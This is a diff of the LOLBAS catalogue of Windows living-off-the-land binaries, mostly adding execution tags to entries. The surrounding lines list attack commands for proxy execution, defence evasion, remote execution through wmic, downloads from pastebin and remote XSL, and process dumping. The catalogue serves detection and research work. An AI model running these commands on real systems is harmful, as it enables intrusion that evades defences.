Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe - Path: c:\windows\system32\OpenSSH\ssh.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Command: stordiag.exe - Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes. Usecase: Possible defence evasion purposes.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\stordiag.exe - Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11 OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary Usecase: Spawn process using other binary
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 1909 and below OperatingSystem: Windows 10 1909 and below
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11 OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid - Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID Usecase: Dump process by PID

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe

View File

@ -11,8 +11,6 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable. Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -20,8 +18,6 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.012 MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: COM
Full_Path: Full_Path:
- Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: Local Administrator - required to enable local manifest setting Privileges: Local Administrator - required to enable local manifest setting
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID] - Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\wlrmdr.exe - Path: c:\windows\system32\wlrmdr.exe
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: wmic.exe process call create calc - Command: wmic.exe process call create calc
Description: Execute calc from wmic Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures Usecase: Execute binary from wmic to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system. Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system Usecase: Execute binary on a remote system
@ -25,6 +29,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied. Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system Usecase: Execute binary on remote system
@ -32,6 +39,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system Usecase: Execute script from remote system
@ -40,7 +50,8 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: XSL
- Execute: Remote
- Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
Description: Copy file from source to destination. Description: Copy file from source to destination.
Usecase: Copy file. Usecase: Copy file.

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe - Path: C:\Windows\System32\WorkFolders.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures Usecase: Run a com object created in registry to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet

View File

@ -27,6 +27,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement: Acknowledgement:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Low privileges Privileges: Low privileges
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -32,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification. Usecase: Run local or remote script(let) code through INF file specification.
@ -19,7 +21,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Input: INF - Execute: INF
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function. Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload. Usecase: Load a DLL payload.
@ -36,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function. Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.
@ -43,6 +47,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\advpack.dll - Path: c:\windows\system32\advpack.dll
- Path: c:\windows\syswow64\advpack.dll - Path: c:\windows\syswow64\advpack.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
Usecase: Launch any executable payload, as long as it uses the .scr extension. Usecase: Launch any executable payload, as long as it uses the .scr extension.
@ -18,6 +20,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\System32\desk.cpl
- Path: C:\Windows\SysWOW64\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: ClickOnce
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification. Usecase: Run local or remote script(let) code through INF file specification.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function. Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload. Usecase: Load a DLL payload.
@ -34,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function. Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.
@ -41,6 +47,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\system32\ieadvpack.dll
- Path: c:\windows\syswow64\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\ieframe.dll - Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: HTA
Full_Path: Full_Path:
- Path: c:\windows\system32\mshtml.dll - Path: c:\windows\system32\mshtml.dll
- Path: c:\windows\syswow64\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\system32\pcwutl.dll
- Path: c:\windows\syswow64\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Input: INF - Execute: INF
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Input: INF - Execute: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\setupapi.dll - Path: c:\windows\system32\setupapi.dll
- Path: c:\windows\syswow64\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll

View File

@ -20,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Description: Launch command line by calling the ShellExec_RunDLL function. Description: Launch command line by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload. Usecase: Run an executable payload.
@ -27,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\shell32.dll - Path: c:\windows\system32\shell32.dll
- Path: c:\windows\syswow64\shell32.dll - Path: c:\windows\syswow64\shell32.dll

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Input: INF - Execute: INF
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Input: INF - Execute: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\syssetup.dll - Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: HTA
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes. Usecase: Load an executable payload by calling a .url file with or without quotes.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: URL
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL. Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Launch an executable by calling FileProtocolHandler. Description: Launch an executable by calling FileProtocolHandler.
Usecase: Launch an executable. Usecase: Launch an executable.
@ -32,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling FileProtocolHandler. Description: Launch an executable by calling FileProtocolHandler.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@ -39,6 +47,8 @@ Commands:
Privileges: User Privileges: User
